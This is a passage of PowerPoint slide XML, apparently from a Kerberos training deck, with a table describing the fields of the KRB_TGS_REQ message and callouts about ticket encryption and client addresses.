                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>If the client computer is multi-homed, the ticket needs to be valid from every IP-enabled adapter, so the addresses are added here (and in the address field in the ticket).  If a ticket is proxied or forwarded, it will be used on the client's behalf from another address (or perhaps several addresses). These addresses will also be included in this field.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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18"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248425" y="2992311"/>
            <a:ext cx="1294726" cy="2687648"/>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四角形吹き出し 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808367" y="3076131"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61948"/>
              <a:gd name="adj2" fmla="val 53448"/>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400" dirty="0"/>
              <a:t>encrypted with user’s key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318968" y="3769514"/>
            <a:ext cx="1128832" cy="1747366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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四角形吹き出し 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1634591" y="3914960"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61948"/>
              <a:gd name="adj2" fmla="val 53448"/>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dirty="0"/>
              <a:t>also included in a ticket</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294400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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_TGS_REQ message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="コンテンツ プレースホルダー 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="4037829"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1741324">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6637998">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">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00"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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01"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="209760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_TGS_REQ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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02"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PAData Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PA-TGS-REQ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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03"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="313340">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PAData Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>TGT and authenticator.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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04"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="198019">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KDC Options</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The client can request that the ticket have certain optional features. The requested options take the form of a bit string. (See the Key Distribution Center Option Flags table above.)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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05"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Name of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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06"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm or domain of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Requested server name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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08"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="198019">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>From</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) If the ticket were postdated (not supported by Windows 2000, but supported in Windows Server 2003), this field would specify the time from which the ticket would be valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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09"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="198019">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Till</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is the requested expiration time. The KDC does not have to honor this request, if the requested expiration time violates the domain's Kerberos policy.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Renew Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) The requested renewal time.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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11"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="391993">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nonce</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A random number generated by the client. The nonce can be used as the basis for sequence numbering or as an additional authenticator. The nonce supplied here will be returned in the encrypted portion of the KRB_TGS_REP message. The client will compare the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nonces</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> to make sure they match.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Encryption Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The desired encryption algorithm to be used.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Addresses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) IP addresses from which ticket will be valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="198019">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Encrypt Authorization Data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6675" marR="6675" marT="6675" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) In the KRB_TGS_REQ message, this will specify a key to use to encrypt any pre-authentication data.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="295007">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Tickets</a:t>
                      </a:r>
